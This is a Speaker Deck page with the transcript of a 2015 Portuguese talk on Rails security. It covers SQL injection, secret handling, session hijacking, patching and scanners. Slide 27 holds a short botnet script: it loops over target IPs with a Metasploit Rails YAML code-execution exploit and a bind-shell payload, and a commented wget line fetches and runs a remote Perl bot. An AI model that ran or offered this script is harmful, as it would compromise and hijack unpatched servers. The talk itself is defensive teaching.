Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Segurança on Rails

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Daniel Romero Daniel Romero
June 22, 2015
Technology
0
110

Segurança on Rails

Nessa talk veremos os vetores de ataque mais utilizados para hackear aplicações Rails e o que pode ser feito para eveitar isso. Ao final, um exemplo prático de como é possível construir uma botnet explorando apps desatualizadas.

Avatar for Daniel Romero

Daniel Romero

June 22, 2015
Tweet

More Decks by Daniel Romero

See All by Daniel Romero
Vulnerabilidades em sistemas web
Avatar for Daniel Romero infoslack
0
79

Other Decks in Technology

See All in Technology
コスト削減から「セキュリティと利便性」を担うプラットフォームへ
Avatar for SansanTech sansantech
PRO
3
1.6k
2026年、サーバーレスの現在地 -「制約と戦う技術」から「当たり前の実行基盤」へ- /serverless2026
Avatar for Serverless Operations slsops
2
260
コミュニティが変えるキャリアの地平線:コロナ禍新卒入社のエンジニアがAWSコミュニティで見つけた成長の羅針盤
Avatar for Kento Suzuki kentosuzuki
0
130
登壇駆動学習のすすめ — CfPのネタの見つけ方と書くときに意識していること
Avatar for おおいし bicstone
3
120
Bill One 開発エンジニア 紹介資料
Avatar for Sansan, Inc. sansan33
PRO
5
17k
小さく始めるBCP ― 多プロダクト環境で始める最初の一歩
Avatar for kekke-n kekke_n
1
470
AIエージェントに必要なのはデータではなく文脈だった/ai-agent-context-graph-mybest
Avatar for Jun Naito jonnojun
0
180
制約が導く迷わない設計 〜 信頼性と運用性を両立するマイナンバー管理システムの実践 〜
Avatar for ないとー bwkw
3
990
Agile Leadership Summit Keynote 2026
Avatar for seki at druby.org m_seki
1
650
[CV勉強会@関東 World Model 読み会] Orbis: Overcoming Challenges of Long-Horizon Prediction in Driving World Models (Mousakhan+, NeurIPS 2025)
Avatar for abemii_ abemii
0
140
Greatest Disaster Hits in Web Performance
Avatar for Estela Franco guaca
0
280
データの整合性を保ちたいだけなんだ
Avatar for ShoheiMitani shoheimitani
8
3.2k

Featured

See All Featured
Testing 201, or: Great Expectations
Avatar for Joseph Mastey jmmastey
46
8k
End of SEO as We Know It (SMX Advanced Version)
Avatar for Michael King ipullrank
3
3.9k
Darren the Foodie - Storyboard
Avatar for Kevinho.art khoart
PRO
2
2.4k
Paper Plane
Avatar for Katie Cordina Lindsey katiecoart
PRO
0
46k
How to Grow Your eCommerce with AI & Automation
Avatar for Katarina Dahlin katarinadahlin
PRO
1
110
Are puppies a ranking factor?
Avatar for Jono Alderson jonoalderson
1
2.7k
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
Avatar for Dr. Kim W Petersen kimpetersen
PRO
0
240
Collaborative Software Design: How to facilitate domain modelling decisions
Avatar for Kenny Baas-Schwegler baasie
0
140
Amusing Abliteration
Avatar for ianozsvald ianozsvald
0
100
Thoughts on Productivity
Avatar for Jon Yablonski jonyablonski
74
5k
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
Avatar for Aleyda Solis aleyda
1
1.9k
YesSQL, Process and Tooling at Scale
Avatar for Rocio Delgado rocio
174
15k

Transcript

  1. None

  2. infoslack.com - @infoslack - github.com/infoslack

  3. initsec.com

  4. infoslack.com/livro

  5. $ rails new project

  6. None
  7. None

  8. Minha aplicação está segura ?

  9. OWASP.org

  10. None

  11. SQL Injection Quem nunca ? User.where( “role = #{params[:role]}” )

    Nunca interpole!

  12. #FAIL email = “ ‘ OR 1) --” User.where(“ email

    = ‘#{email}’ ”).first #=> #<User id: 1, email: “[email protected]”> #OK User.where(email: params[:email]) Para ver mais: http://rails-sqli.org/

  13. Configs • não salve configs no repositório; • use variáveis

    de ambiente; • inserir arquivo de config apenas na hora do deploy; • SECRET TOKEN / config/secrets.yml
  14. None

  15. Session Hijacking • cookies para identificação de users; ◦ hacker

    pode roubar o cookie de um user • SSL em todo processo de autenticação; ◦ config.force_ssl = true • user inativo? ◦ expire a sessão! Mantenha tudo atualizado sempre!
  16. None

  17. Mesmo utilizando SSL tome cuidado!

  18. None
  19. None

  20. Ainda tem muito mais! • Updates! ◦ Updates no server

    (kernel); ◦ Updates nos softwares do server; ◦ Updates no framework; ◦ Updates nas dependências do projeto; ◦ Updates everywhere!

  21. Como posso verificar? • Testando a segurança do meu código

    #análise estática ◦ http://brakemanscanner.org/ ◦ https://codeclimate.com/ • Verificando atualizações: ◦ http://www.rubysec.com/ ◦ https://github.com/rubysec/ruby-advisory-db ◦ https://github.com/rubysec/bundler-audit ◦ https://hakiri.io/

  22. hakiri.io/facets

  23. None

  24. Como posso testar ?

  25. None

  26. Show me!

  27. Botnet #!/bin/sh TARGETS="ip-list.txt" CLI="metasploit-framework/msfcli" for host in $(cat $TARGETS) do

    tmux new-window -n $host $CLI'\ multi/http/rails_xml_yaml_code_exec rhost='$host'\ payload=ruby/shell_bind_tcp E' done #wget -O - http://labs.infoslack.com/bot.pl > /tmp/bot.pl && perl /tmp/bot.pl

  28. O que mais posso fazer ? • http://www.ubuntu.com/usn/ • https://www.ruby-lang.org/en/security/

    • http://nginx.org/en/security_advisories.html • http://guides.rubyonrails.org/security.html
  29. None